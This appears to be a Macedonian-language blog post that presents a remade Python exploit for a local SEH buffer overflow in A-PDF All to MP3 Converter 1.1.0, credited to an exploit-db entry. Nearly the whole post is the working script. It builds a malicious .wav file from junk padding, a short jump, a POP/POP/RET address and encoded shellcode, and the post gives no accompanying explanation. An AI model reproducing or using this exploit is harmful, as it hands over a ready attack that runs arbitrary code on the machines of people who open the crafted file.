A-PDF All to MP3 Converter v.1.1.0 Universal Local SEH Exploit Објаснување на функционалности


Back on track……Ме немаше некое време hhhh

Како за почеток една ремејк скрипта на http://www.exploit-db.com/exploits/15033/ што ќе ја објаснам за некое време за тоа како се креира BOF во Windows со SEH. За тоа подоцна…..

from struct import *
import time
f=open(“A-PDF All to MP3.wav”,”w”)
shell=(“\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x61”
“\x28\x38\x56\x83\xeb\xfc\xe2\xf4\x9d\xc0\x7c\x56\x61\x28\xb3\x13”
“\x5d\xa3\x44\x53\x19\x29\xd7\xdd\x2e\x30\xb3\x09\x41\x29\xd3\x1f”
“\xea\x1c\xb3\x57\x8f\x19\xf8\xcf\xcd\xac\xf8\x22\x66\xe9\xf2\x5b”
“\x60\xea\xd3\xa2\x5a\x7c\x1c\x52\x14\xcd\xb3\x09\x45\x29\xd3\x30”
“\xea\x24\x73\xdd\x3e\x34\x39\xbd\xea\x34\xb3\x57\x8a\xa1\x64\x72”
“\x65\xeb\x09\x96\x05\xa3\x78\x66\xe4\xe8\x40\x5a\xea\x68\x34\xdd”
“\x11\x34\x95\xdd\x09\x20\xd3\x5f\xea\xa8\x88\x56\x61\x28\xb3\x3e”
“\x5d\x77\x09\xa0\x01\x7e\xb1\xae\xe2\xe8\x43\x06\x09\xd8\xb2\x52”
“\x3e\x40\xa0\xa8\xeb\x26\x6f\xa9\x86\x4b\x59\x3a\x02\x28\x38\x56”);
print “Creating expoit.”
time.sleep(1)
print “Creating explot..”
time.sleep(1)
print “Creating explot…”
junk=”\x41″*4132
print “Your shellcode size is:”,len(shell)
nseh=”\xeb\x06\x90\x90″
seh=”\x75\x95\x00\x6d”#6d009575 POP ESI
try:
f.write(junk+nseh+seh+shell)
f.close()
print “File created”
except:
print “File cannot be created”
Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: